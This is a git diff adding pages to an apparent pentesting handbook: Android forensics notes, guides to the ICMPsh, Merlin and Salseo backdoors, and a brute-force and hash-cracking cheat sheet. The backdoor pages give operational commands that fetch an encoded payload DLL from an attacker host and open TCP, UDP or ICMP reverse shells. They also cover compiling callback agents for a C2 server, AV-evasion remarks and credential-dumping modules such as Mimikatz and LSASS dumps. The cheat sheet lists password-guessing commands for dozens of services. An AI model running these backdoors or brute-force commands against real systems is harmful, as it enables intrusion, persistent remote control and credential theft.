+* I'm very proud of this **book** and my **PEASS** \(I'm talking about these peass: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)\)
+* And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking**.
+
+### Support HackTricks
+
+Thank you for be **reading this**!
+
+If you **like HackTricks** and use it on your **daily basis** and you can afford it, please consider to **send a small** donation as a sign of **gratitude:** [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)  
+Also, don't forget to **share the book** with others that can find it helpful.
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
diff --git a/android-forensics.md b/android-forensics.md
new file mode 100644
index 00000000..fe4bf492
--- /dev/null
+++ b/android-forensics.md
@@ -0,0 +1,24 @@
+# Android Forensics
+
+## Locked Device
+
+To start extracting data from an Android device it has to be unlocked. If it's locked you can:
+
+* Check if the device has debugging via USB activated.
+* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)
+* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
+
+## Data Adquisition
+
+Create an [android backup using adb](mobile-apps-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar`
+
+### If root access or physical connection to JTAG interface
+
+* `cat /proc/partitions` \(search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory\).
+* `df /data` \(Discover the block size of the system\).
+* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 \(execute it with the information gathered from the block size\).
+
+### Memory
+
+Use Linux Memory Extractor \(LiME\) to extract the RAM information. It's a kernel extension that should be loaded via adb.
+
diff --git a/backdoors/empire.md b/backdoors/empire.md
new file mode 100644
index 00000000..cf0d31ce
--- /dev/null
+++ b/backdoors/empire.md
@@ -0,0 +1,6 @@
+---
+description: 'https://github.com/EmpireProject/Empire'
+---
+
+# Empire
+
diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md
new file mode 100644
index 00000000..b9b44431
--- /dev/null
+++ b/backdoors/icmpsh.md
@@ -0,0 +1,34 @@
+---
+description: 'https://github.com/inquisb/icmpsh'
+---
+
+# ICMPsh
+
+Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
+
+## Client side
+
+Execute the script: **run.sh**
+
+**If you get some error, try to change the lines:**
+
+```bash
+IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
+IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
+```
+
+**For:**
+
+```bash
+echo Please insert the IP where you want to listen
+read IP
+```
+
+## **Victim Side**
+
+Upload **icmpsh.exe** to the victim and execute:
+
+```bash
+icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
+```
+
diff --git a/backdoors/merlin.md b/backdoors/merlin.md
new file mode 100644
index 00000000..4faa9e88
--- /dev/null
+++ b/backdoors/merlin.md
@@ -0,0 +1,95 @@
+---
+description: 'https://github.com/Ne0nd0g/merlin'
+---
+
+# Merlin
+
+## Installation
+
+### Install GO
+
+```text
+#Download GO package from: https://golang.org/dl/
+#Decompress the packe using:
+tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz
+
+#Change /etc/profile
+Add ":/usr/local/go/bin" to PATH
+Add "export GOPATH=$HOME/go"
+Add "export GOBIN=$GOPATH/bin"
+
+source /etc/profile
+```
+
+### Install Merlin
+
+```text
+go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
+cd $GOPATH/src/github.com/Ne0nd0g/merlin/
+```
+
+## Launch Merlin Server
+
+```text
+go run cmd/merlinserver/main.go -i
+```
+
+## Merlin Agents
+
+You can [download precompiled agents](https://github.com/Ne0nd0g/merlin/releases)
+
+### Compile Agents
+
+Go to the main folder _$GOPATH/src/github.com/Ne0nd0g/merlin/_
+
+```text
+#User URL param to set the listener URL
+make #Server and Agents of all
+make windows #Server and Agents for Windows
+make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)
+```
+
+### **Manual compile agents**
+
+```text
+GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g
+```
+
+## Modules
+
+**The bad news is that every module used by Merlin is downloaded from the source \(github\) and saved indisk before using it. Forge about usingwell known modules because Windows Defender will catch you!**  
+
+
+**SafetyKatz** --&gt; Modified Mimikatz. Dump LSASS to file and launch:sekurlsa::logonpasswords to that file  
+**SharpDump** --&gt; minidump for the process ID specified \(LSASS by default\) \(Itsais that the extension of the final file is .gz but indeed it is.bin, but is agz file\)  
+**SharpRoast** --&gt;Kerberoast \(doesn't work\)  
+**SeatBelt** --&gt; Local Security Tests in CS \(does not work\) https://github.com/GhostPack/Seatbelt/blob/master/Seatbelt/Program.cs  
+**Compiler-CSharp** --&gt; Compile using csc.exe /unsafe  
+**Sharp-Up** --&gt;Allchecks in C\# in powerup \(works\)  
+**Inveigh** --&gt; PowerShellADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool \(doesn't works, need to load: https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\)  
+**Invoke-InternalMonologue** --&gt; impersonates all available users and retrieves a challenge-response for each \(NTLM hash for each user\) \(bad url\)  
+**Invoke-PowerThIEf** --&gt; Steal forms from IExplorer or make it execute JS or inject a DLL in that process \(doesnt work\) \(and the PS looks like doesnt work either\) https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1  
+**LaZagneForensic** --&gt; Get browser passwords \(works but dont prints the output directory\)  
+**dumpCredStore** --&gt; Win32 Credential Manager API \(https://github.com/zetlen/clortho/blob/master/CredMan.ps1\) https://www.digitalcitizen.life/credential-manager-where-windows-stores-passwords-other-login-details  
+**Get-InjectedThread** --&gt; Detect classic injection in running processes \(Classic Injection \(OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread\)\) \(doesnt works\)  
+**Get-OSTokenInformation** --&gt; Get Token Info of the running processes and threads \(User, groups, privileges, owner… https://docs.microsoft.com/es-es/windows/desktop/api/winnt/ne-winnt-\_token\_information\_class\)  
+**Invoke-DCOM** --&gt; Execute a command \(inother computer\) via DCOM \(http://www.enigma0x3.net.\) \(https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/\)  
+**Invoke-DCOMPowerPointPivot** --&gt; Execute a command in othe PC abusing PowerPoint COM objects \(ADDin\)  
+**Invoke-ExcelMacroPivot** --&gt; Execute a command in othe PC abusing DCOM in Excel  
+**Find-ComputersWithRemoteAccessPolicies** --&gt; \(not working\) \(https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/\)  
+**Grouper** --&gt; It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff. \(deprecated\) Take a look at Grouper2, looks really nice  
+**Invoke-WMILM** --&gt; WMI to move laterally  
+**Get-GPPPassword** --&gt; Look for groups.xml, scheduledtasks.xml, services.xmland datasources.xml and returns plaintext passwords \(insidedomain\)  
+**Invoke-Mimikatz** --&gt; Use mimikatz \(default dump creds\)  
+**PowerUp** --&gt; https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc  
+**Find-BadPrivilege** --&gt; Check the privileges of users in computers  
+**Find-PotentiallyCrackableAccounts** --&gt; retrieve information about user accounts associated with SPN \(Kerberoasting\)  
+**psgetsystem** --&gt; getsystem
+
+**Didn't check persistence modules**
+
+## Resume
+
+I really like the feeling and the potential of the tool.  
+I hope the tool will start downloading the modules from the server and integrates some kind of evasion when downloading scripts.
+
diff --git a/backdoors/salseo.md b/backdoors/salseo.md
new file mode 100644
index 00000000..9978025e
--- /dev/null
+++ b/backdoors/salseo.md
@@ -0,0 +1,179 @@
+---
+description: 'https://github.com/Hackplayers/Salsa-tools'
+---
+
+# Salseo
+
+## Compiling the binaries
+
+Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
+
+Compile those projects for the architecture of the windows box where your are going to use them\(If the Windows supports x64 compile them for that architectures\).
+
+You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
+
+**\(**If you can't find this options press in **"Project Tab"** and then in **"&lt;Project Name&gt; Properties"**\)
+
+![](../.gitbook/assets/image%20%28154%29.png)
+
+Then, build both projects \(Build -&gt; Build Solution\) \(Inside the logs will appear the path of the executable\):
+
+![](../.gitbook/assets/image%20%28233%29.png)
+
+## Prepare the Backdoor
+
+First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**
+
+### **Python**
+
+```text
+python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
+python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
+```
+
+### Windows
+
+```text
+EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
+EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
+```
+
+Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.**
+
+**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
+
+## **Execute the backdoor**
+
+### **Getting a TCP reverse shell \(downloading encoded dll through HTTP\)**
+
+Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.
+
+```text
+SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
+```
+
+### **Getting a UDP reverse shell \(downloading encoded dll through SMB\)**
+
+Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa \(impacket-smbserver\).
+
+```text
+SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
+```
+
+### **Getting a ICMP reverse shell \(encoded dll already inside the victim\)**
+
+**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)\*\*\*\*
+
+#### **Disable ICMP Replies:**
+
+```text
+sysctl -w net.ipv4.icmp_echo_ignore_all=1
+
+#You finish, you can enable it again running:
+sysctl -w net.ipv4.icmp_echo_ignore_all=0
+```
+
+#### Execute the client:
+
+```text
+python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
+```
+
+#### Inside the victim, lets execute the salseo thing:
+
+```text
+SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
+```
+
+## Compiling SalseoLoader as DLL exporting main function
+
+Open the SalseoLoader project using Visual Studio.
+
+### Add before the main function: \[DllExport\]
+
+![](../.gitbook/assets/image%20%2888%29.png)
+
+### Install DllExport for this project
+
+#### **Tools** --&gt; **NuGet Package Manager** --&gt; **Manage NuGet Packages for Solution...**
+
+![](../.gitbook/assets/image%20%2855%29.png)
+
+#### **Search for DllExport package \(using Browse tab\), and press Install \(and accept the popup\)**
+
+![](../.gitbook/assets/image%20%28240%29.png)
+
+In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
+
+### **U**ninstall DllExport
+
+Press **Uninstall** \(yeah, its weird but trust me, it is necessary\)
+
+![](../.gitbook/assets/image%20%28104%29.png)
+
+### **Exit Visual Studio and execute DllExport\_configure**
+
+Just **exit** Visual Studio
+
+Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat**
+
+Select **x64** \(if you are going to use it inside a x64 box, that was my case\), select **System.Runtime.InteropServices** \(inside **Namespace for DllExport**\) and press **Apply**
+
+![](../.gitbook/assets/image%20%28236%29.png)
+
+### **Open the project again with visual Studio**
+
+**\[DllExport\]** should not be longer marked as error
+
+![](../.gitbook/assets/image%20%28249%29.png)
+
+### Build the solution
+
+Select **Output Type = Class Library** \(Project --&gt; SalseoLoader Properties --&gt; Application --&gt; Output type = Class Library\)
+
+![](../.gitbook/assets/image%20%28226%29.png)
+
+Select **x64** **platform** \(Project --&gt; SalseoLoader Properties --&gt; Build --&gt; Platform target = x64\)
+
+![](../.gitbook/assets/image%20%28137%29.png)
+
+To **build** the solution: Build --&gt; Build Solution \(Inside the Output console the path of the new DLL will appear\)
+
+### Test the generated Dll
+
+Copy and paste the Dll where you want to test it.
+
+Execute:
+
+```text
+rundll32.exe SalseoLoader.dll,main
+```
+
+If not error appears, probably you have a functional dll!!
+
+## Get a shell using the Dll
+
+Don't forget to use a **HTTP** **server** and set a **nc** **listener**
+
+### Powershell
+
+```text
+$env:pass="password"
+$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
+$env:lhost="10.2.0.5"
+$env:lport="1337"
+$env:shell="reversetcp"
+rundll32.exe SalseoLoader.dll,main
+```
+
+### CMD
+
+```text
+set pass=password
+set payload=http://10.2.0.5/evilsalsax64.dll.txt
+set lhost=10.2.0.5
+set lport=1337
+set shell=reversetcp
+rundll32.exe SalseoLoader.dll,main
+```
+
diff --git a/brute-force.md b/brute-force.md
new file mode 100644
index 00000000..3048e17f
--- /dev/null
+++ b/brute-force.md
@@ -0,0 +1,504 @@
+# Brute Force - CheatSheet
+
+## Default Credentials
+
+**Search in google** for default credentials of the technology that is being used, or **try this links**:
+
+* \*\*\*\*[**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)\*\*\*\*
+* \*\*\*\*[**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)\*\*\*\*
+* \*\*\*\*[**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)\*\*\*\*
+* \*\*\*\*[**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)\*\*\*\*
+* \*\*\*\*[**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)\*\*\*\*
+* \*\*\*\*[**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)\*\*\*\*
+* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)\*\*\*\*
+* \*\*\*\*[**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)\*\*\*\*
+* \*\*\*\*[**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com/)\*\*\*\*
+
+## **Create your own Dictionaries**
+
+Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
+
+### Crunch
+
+```text
+crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
+crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
+
+@ Lower case alpha characters
+, Upper case alpha characters
+% Numeric characters
+^ Special characters including spac
+crunch 6 8 -t ,@@^^%%
+```
+
+### Cewl
+
+```bash
+cewl example.com -m 5 -w words.txt
+```
+
+### [pydictor](https://github.com/LandGrey/pydictor)
+
+### Wordlists
+
+* \*\*\*\*[**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)\*\*\*\*
+* \*\*\*\*[**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)\*\*\*\*
+* \*\*\*\*[**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi)\*\*\*\*
+* \*\*\*\*[**https://github.com/google/fuzzing/tree/master/dictionaries**](%20https://github.com/google/fuzzing/tree/master/dictionaries)\*\*\*\*
+* \*\*\*\*[**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)\*\*\*\*
+
+## Services
+
+Ordered alphabetically by service name.
+
+### AFP
+
+```bash
+nmap -p 548 --script afp-brute <IP>
+msf> use auxiliary/scanner/afp/afp_login
+msf> set BLANK_PASSWORDS true
+msf> set USER_AS_PASS true
+msf> set PASS_FILE <PATH_PASSWDS>
+msf> set USER_FILE <PATH_USERS>
+msf> run
+```
+
+### AJP
+
+```bash
+nmap --script ajp-brute -p 8009 <IP>
+```
+
+### Cassandra
+
+```bash
+nmap --script cassandra-brute -p 9160 <IP>
+```
+
+### CouchDB
+
+```bash
+msf> use auxiliary/scanner/couchdb/couchdb_login
+```
+
+### FTP
+
+```bash
+hydra -l root -P passwords.txt [-t 32] <IP> ftp
+ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
+medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
+```
+
+### HTTP Generic Brute
+
+#### [**WFuzz**](pentesting-web/web-tool-wfuzz.md)\*\*\*\*
+
+### HTTP Basic Auth
+
+```bash
+hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
+medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
+```
+
+### HTTP - Post Form
+
+```bash
+hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
+```
+
+For http**s** you have to change from "http-post-form" to "**https-post-form"**
+
+### **HTTP - CMS --** \(W\)ordpress, \(J\)oomla or \(D\)rupal or \(M\)oodle
+
+```bash
+cmsmap -f W/J/D/M -u a -p a https://wordpress.com
+```
+
+### IMAP
+
+```bash
+hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
+hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
+nmap -sV --script imap-brute -p <PORT> <IP>
+```
+
+### IRC
+
+```bash
+nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
+```
+
+### ISCSI
+
+```bash
+nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
+```
+
+### LDAP
+
+```bash
+nmap --script ldap-brute -p 389 <IP>
+```
+
+### Mongo
+
+```bash
+nmap -sV --script mongodb-brute -n -p 27017 <IP>
+use auxiliary/scanner/mongodb/mongodb_login
+```
+
+### MySQL
+
+```bash
+hydra -L usernames.txt -P pass.txt <IP> mysql
+msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
+```
+
+### OracleSQL
+
+```bash
+patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
+
+./odat.py passwordguesser -s $SERVER -d $SID
+./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
+
+#msf1
+msf> use admin/oracle/oracle_login
+msf> set RHOSTS <IP>
+msf> set RPORT 1521
+msf> set SID <SID>
+
+#msf2, this option uses nmap and it fails sometimes for some reason
+msf> use scanner/oracle/oracle_login
+msf> set RHOSTS <IP>
+msf> set RPORTS 1521
+msf> set SID <SID>
+
+#nmap fails sometimes for some reson executing this script
+nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
+```
+
+In order to use **oracle\_login** with **patator** you need to **install**:
+
+```bash
+pip3 install cx_Oracle --upgrade
+```
+
+[Offline OracleSQL hash bruteforce](pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) \(**versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** and **11.2.0.3**\):
+
+```bash
+ nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
+```
+
+### POP
+
+```bash
+hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
+hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
+```
+
+### PostgreSQL
+
+```bash
+hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
+medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
+ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
+patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
+use auxiliary/scanner/postgres/postgres_login
+nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
+```
+
+### PPTP
+
+You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
+
+```bash
+sudo dpkg -i thc-pptp-bruter*.deb #Install the package
+cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
+```
+
+### RDP 
+
+```bash
+ncrack -vv --user <User> -P pwds.txt rdp://<IP>
+hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
+```
+
+### Redis
+
+```bash
+msf> use auxiliary/scanner/redis/redis_login
+nmap --script redis-brute -p 6379 <IP>
+hydra –P /path/pass.txt <IP> redis
+```
+
+### Rexec
+
+```bash
+hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
+```
+
+### Rlogin
+
+```bash
+hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
+```
+
+### Rsh
+
+```bash
+hydra -L <Username_list> rsh://<Victim_IP> -v -V
+```
+
+[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
+
+### Rsync
+
+```bash
+nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
+```
+
+### RTSP
+
+```bash
+hydra -l root -P passwords.txt <IP> rtsp
+```
+
+### SNMP
+
+```bash
+msf> use auxiliary/scanner/snmp/snmp_login
+nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
+onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
+hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
+```
+
+### SMB
+
+```bash
+nmap --script smb-brute -p 445 <IP>
+hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
+```
+
+### SMTP
+
+```bash
+hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
+hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
+```
+
+### SQL Server
+
+```bash
+#Use the NetBIOS name of the machine as domain
+hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
+medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
+nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
+msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
+```
+
+### SSH
+
+```bash
+hydra -l root -P passwords.txt [-t 32] <IP> ssh
+ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
+medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
+```
+
+### Telnet
+
+```bash
+hydra -l root -P passwords.txt [-t 32] <IP> telnet
+ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
+medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
+```
+
+### VNC
+
+```bash
+hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
+medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
+ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
+patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login
+nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
+```
+
+## Local
+
+### Online cracking databases
+
+* [http://hashtoolkit.com/reverse-hash?](http://hashtoolkit.com/reverse-hash?) \(MD5 & SHA1\)
+* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com/) \(Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...\)
+* [https://crackstation.net/](https://crackstation.net/) \(Hashes\)
+* [https://md5decrypt.net/](https://md5decrypt.net/) \(MD5\)
+* [https://gpuhash.me/](https://gpuhash.me/) \(Hashes and file hashes\)
+* [https://hashes.org/search.php](https://hashes.org/search.php) \(Hashes\)
+* [https://www.cmd5.org/](https://www.cmd5.org/) \(Hashes\)
+* [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) \(MD5, NTLM, SHA1, MySQL5, SHA256, SHA512\)
+* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) \(MD5\)
+
+Check this out before trying to bruteforce a Hash.
+
+### ZIP
+
+```bash
+fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
+```
+
+```bash
+zip2john file.zip > zip.john
+john zip.john
+```
+
+### 7z
+
+```bash
+cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
+```
+
+```bash
+#Download and install requirements for 7z2john
+wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
+apt-get install libcompress-raw-lzma-perl
+./7z2john.pl file.7z > 7zhash.john
+```
+
+### PDF
+
+```bash
+apt-get install pdfcrack
+pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
+#pdf2john didnt worked well, john didnt know which hash type was
+# To permanently decrypt the pdf
+sudo apt-get install qpdf
+qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
+```
+
+### JWT
+
+```bash
+git clone https://github.com/Sjord/jwtcrack.git
+cd jwtcrack
+
+#Bruteforce using crackjwt.py
+python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
+
+#Bruteforce using john
+python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
+john jwt.john #It does not work with Kali-John
+```
+
+### NTLM cracking
+
+```bash
+Format:USUARIO:ID:HASH_LM:HASH_NT:::
+jhon --wordlist=/usr/share/wordlists/rockyou.txt --fomrat=NT file_NTLM.hashes
+hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
+```
+
+### Keepass
+
+```bash
+sudo apt-get install -y kpcli #Install keepass tools like keepass2john
+keepass2john file.kdbx > hash #The keepass is only using password
+keepass2john -k <file-password> file.kdbx > hash # The keepas is also using a file as a needed credential
+#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john
+john --wordlist=/usr/share/wordlists/rockyou.txt hash
+```
+
+### Keberoasting
+
+```bash
+john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
+hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
+./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
+```
+
+### Lucks image
+
+#### Method 1
+
+Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
+
+```bash
+bruteforce-luks -f ./list.txt ./backup.img
+cryptsetup luksOpen backup.img mylucksopen
+ls /dev/mapper/ #You should find here the image mylucksopen
+mount /dev/mapper/mylucksopen /mnt
+```
+
+#### Method 2
+
+```bash
+cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
+dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
+hashcat -m 14600 luckshash 
+cryptsetup luksOpen backup.img mylucksopen
+ls /dev/mapper/ #You should find here the image mylucksopen
+mount /dev/mapper/mylucksopen /mnt
+```
+
+### Mysql
+
+```bash
+#John hash format
+<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
+dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
+```
+
+## Tools
+
+**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
+
+### Hash-identifier
+
+```bash
+hash-identifier
+> <HASH>
+```
+
+### John mutation
+
+Read _**/etc/john/john.conf**_ and configure it
+
+```bash
+john --wordlist=words.txt --rules --stdout > w_mutated.txt
+john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
+```
+
+### Hashcat
+
+```bash
+hashcat --example-hashes | grep -B1 -A2 "NTLM"
+```
+
+Cracking Linux Hashes - /etc/shadow file
+
+```text
+ 500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
+3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
+7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
+1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems
